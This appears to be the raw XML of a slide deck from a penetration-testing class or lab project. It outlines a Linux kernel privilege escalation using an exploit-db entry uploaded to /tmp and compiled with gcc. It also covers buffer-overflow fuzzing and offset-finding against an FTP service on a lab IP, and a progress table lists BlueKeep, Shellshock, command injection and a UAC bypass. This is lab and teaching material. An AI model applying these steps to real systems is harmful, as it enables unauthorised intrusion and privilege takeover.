            <a:ext cx="7410450" cy="12192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ga96dc51dba_0_22"/>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Privilege escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770" name="Google Shape;770;ga96dc51dba_0_22"/>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AutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Getting the system info</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="771" name="Google Shape;771;ga96dc51dba_0_22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665588" y="2322575"/>
            <a:ext cx="6867525" cy="29146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ga96dc51dba_0_29"/>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Find the exploit in exploit DB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778" name="Google Shape;778;ga96dc51dba_0_29"/>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AutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The is one exploit suitable → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/37292</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set up the payload and put within your kali</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="779" name="Google Shape;779;ga96dc51dba_0_29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="185775" y="3142875"/>
            <a:ext cx="5820773" cy="2755674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="780" name="Google Shape;780;ga96dc51dba_0_29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5209475" y="6050949"/>
            <a:ext cx="3444709" cy="65465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ga96dc51dba_0_38"/>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Upload the payload into the Ubuntu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="787" name="Google Shape;787;ga96dc51dba_0_38"/>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AutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Upload via simpleHTTPServer in the tmp folder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="788" name="Google Shape;788;ga96dc51dba_0_38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="2347500"/>
            <a:ext cx="5465650" cy="2163000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="789" name="Google Shape;789;ga96dc51dba_0_38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2216500" y="4757700"/>
            <a:ext cx="6437559" cy="11429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ga96dc51dba_0_47"/>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Activate the payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="796" name="Google Shape;796;ga96dc51dba_0_47"/>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Using gcc and ./ to execute the payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="797" name="Google Shape;797;ga96dc51dba_0_47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="2367050"/>
            <a:ext cx="2838450" cy="3238500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="798" name="Google Shape;798;ga96dc51dba_0_47"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3504051" y="3388950"/>
            <a:ext cx="5138600" cy="17864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ga96dc51dba_0_55"/>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Check if it happens</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;ga96dc51dba_0_55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="833400" y="1722438"/>
            <a:ext cx="7477200" cy="47064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Using whoami, id</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>Then use su</a:t>
            </a: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r>
              <a:rPr lang="en-US"/>
              <a:t>From here we already got privilege escalation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="806" name="Google Shape;806;ga96dc51dba_0_55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="771625" y="2286100"/>
            <a:ext cx="4474893" cy="1142900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="807" name="Google Shape;807;ga96dc51dba_0_55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="771625" y="3952700"/>
            <a:ext cx="4305300" cy="10096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gba014e31c3_0_0"/>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Buffer overflow (Fuzzing)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="814" name="Google Shape;814;gba014e31c3_0_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="1537750"/>
            <a:ext cx="39543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Run a python script that will send “A”s, starting from 100 “A”s and increment by 20 until the program crashes.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="815" name="Google Shape;815;gba014e31c3_0_0"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="818275" y="2374780"/>
            <a:ext cx="6907901" cy="410426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gba014e31c3_0_7"/>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Buffer overflow (Fuzzing)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="822" name="Google Shape;822;gba014e31c3_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="1537750"/>
            <a:ext cx="39543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Run a python script that will send “A”s, starting from 100 “A”s and increment by 20 until the program crashes.</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Run the command: python check.py 192.168.1.4 21</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The last successful amount of bytes sent is 240 bytes.</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823" name="Google Shape;823;gba014e31c3_0_7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="935850" y="5236726"/>
            <a:ext cx="2414200" cy="1519725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="824" name="Google Shape;824;gba014e31c3_0_7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3501075" y="5236725"/>
            <a:ext cx="39543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The EIP value is 41414141 (hex value of A) because it is overwritten with “A”s.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="825" name="Google Shape;825;gba014e31c3_0_7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1467500" y="3089575"/>
            <a:ext cx="4676025" cy="1865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ae927e1771_3_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665163" y="893763"/>
            <a:ext cx="7782000" cy="60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Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Task Allocation and Progress</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;gae927e1771_3_0"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>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t>Justin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-139700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3200"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="237" name="Google Shape;237;gae927e1771_3_0"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="2362200"/>
          <a:ext cx="6096000" cy="2489640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{5830FC0F-5C3E-4966-B63A-2CCE79721B59}</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5850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" u="none" strike="noStrike" cap="none"/>
                        <a:t>Task </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Progress</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Buffer Overflow on Windows file server</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Command injection on web</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Shellshock </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Bluekeep</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>UAC bypass on WIN 10</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;gae927e1771_3_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="5857875"/>
            <a:ext cx="36576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F0000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Indicate past, current and future task</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gba014e31c3_0_16"/>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Buffer overflow (Finding the offset)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="Google Shape;832;gba014e31c3_0_16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665600" y="1537750"/>
            <a:ext cx="39543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833" name="Google Shape;833;gba014e31c3_0_16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777100" y="2198502"/>
            <a:ext cx="7179276" cy="856175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="Google Shape;834;gba014e31c3_0_16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777100" y="1778000"/>
            <a:ext cx="45582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Create a unique string of 240 bytes using a metasploit tool.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="835" name="Google Shape;835;gba014e31c3_0_16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777100" y="3467625"/>
            <a:ext cx="4611800" cy="2970225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="836" name="Google Shape;836;gba014e31c3_0_16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777100" y="3082325"/>
            <a:ext cx="64254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Copy the generated unique string into the step1.py python script in pattern.</a:t>
            </a:r>
            <a:endParaRPr>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ba014e31c3_0_26"/>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Buffer overflow (Finding the offset)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="843" name="Google Shape;843;gba014e31c3_0_26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="713625" y="2186700"/>
            <a:ext cx="5067300" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="844" name="Google Shape;844;gba014e31c3_0_26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
